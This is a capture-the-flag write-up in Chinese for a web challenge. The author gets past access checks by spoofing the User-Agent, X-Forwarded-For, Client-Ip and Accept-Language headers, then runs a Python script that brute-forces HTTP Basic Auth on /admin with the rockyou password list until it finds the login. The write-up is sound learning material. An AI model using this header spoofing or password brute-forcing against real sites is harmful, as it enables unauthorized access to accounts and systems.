12002-Monster - HackMD

# 12002-Monster > http://ctf.adl.tw:12002/ ## Intro 進來之後只會看到 ![](https://i.imgur.com/Ulz9AUj.png) ok gogo python :snake: ## You must use STARRYBrowser 用 python 寫 request，設好 `user-agent` ```python import requests headers = { 'user-agent': 'STARRYBrowser', } response = requests.get( url='http://ctf.adl.tw:12002/', headers=headers ) print(response.content.decode('utf-8')) ``` GET ![](https://i.imgur.com/ARa7IMG.png) ## You must come from 127.0.0.1 設 `X-Forwarded-For` (這題不用設 `host`) ```python headers = { 'user-agent': 'STARRYBrowser', 'X-Forwarded-For': '127.0.0.1', } ``` GET ![](https://i.imgur.com/KAFmVkl.png) ## You must speak Japanese and you must be in Japan. 查一下日本 IP ![](https://i.imgur.com/KgxnyGa.png) 從裡面隨便挑一個，設 `Client-Ip` 跟 `Accept-Language` ```python! headers = { 'user-agent': 'STARRYBrowser', 'X-Forwarded-For': '127.0.0.1', 'Client-Ip': '3.112.97.0', 'Accept-Language': 'ja-JP', } ``` GET ![](https://i.imgur.com/os58Mcf.png) `bocchi & 🤘rockyou!!!` ## Now, you must login 前往 `/admin`，可以發現這個網站使用 HTTP Basic Authentication 作為登入方式，其實就是把帳號密碼 encode 成 base64 型式，前面加上 `Basic` 之後放到 header 的 `Authorization` 一欄在 python 的實作是 ```python # Basic Auth func # https://stackoverflow.com/questions/6999565/python-https-get-with-basic-authentication def basic_auth(username, password): token = b64encode(f"{username}:{password}".encode('utf-8')).decode("ascii") auth = f'Basic {token}' return auth headers = { 'user-agent': 'STARRYBrowser', 'X-Forwarded-For': '127.0.0.1', 'Client-Ip': '3.112.97.0', 'Accept-Language': 'ja-JP', 'Authorization': basic_auth('testusername', 'testpassword') } ``` 嘗試使用各種 `bocchi & 🤘rockyou!!!` 當作帳號密碼的組合，全部失敗 ![](https://i.imgur.com/zLUuJpO.png) 經過長時間的**通靈**與**助教提示** > ![](https://i.imgur.com/HVhfkPf.png) 我們找到了： ![](https://i.imgur.com/iqg2QCE.png) > https://github.com/brannondorsey/naive-hashcat/releases/tag/data 這是個長達 133MB 、共 `14344391`條的密碼字典既然 `rockyou` 表示密碼，那我們就用帳號 `bocchi`, 密碼從這檔案窮舉來瞎猜看看。 ```python file1 = open('rockyou.txt', 'r', encoding='latin-1') lines = file1.readlines() count = 0 for line in lines: s = line.strip() count += 1 print("{}) try: bocchi & {}".format(count, s)) headers['Authorization'] = basic_auth('bocchi', s) response = requests.get(url='http://ctf.adl.tw:12002/admin',headers=headers) if 'You have not been verified' not in response.text: print('Find! ', s) break ``` 跑一個晚上，起床發現它竟然找到了！ ![](https://i.imgur.com/bSmTEoz.png) 用這組帳密印出網頁內容 ```python headers['Authorization'] = basic_auth('bocchi', 'bocchio') response = requests.get(url='http://ctf.adl.tw:12002/admin', headers=headers) print(response.text) ``` ![](https://i.imgur.com/PYFXoIn.png) ![](https://i.imgur.com/4YhyFxq.png) > flag: `ADL{g0men_Im4OK4N3Naik4ra_0BOte_https://youtu.be/Gc3NKC8TQtY}` > ![](https://i.imgur.com/eauZqf0.png) > bocchi and foohow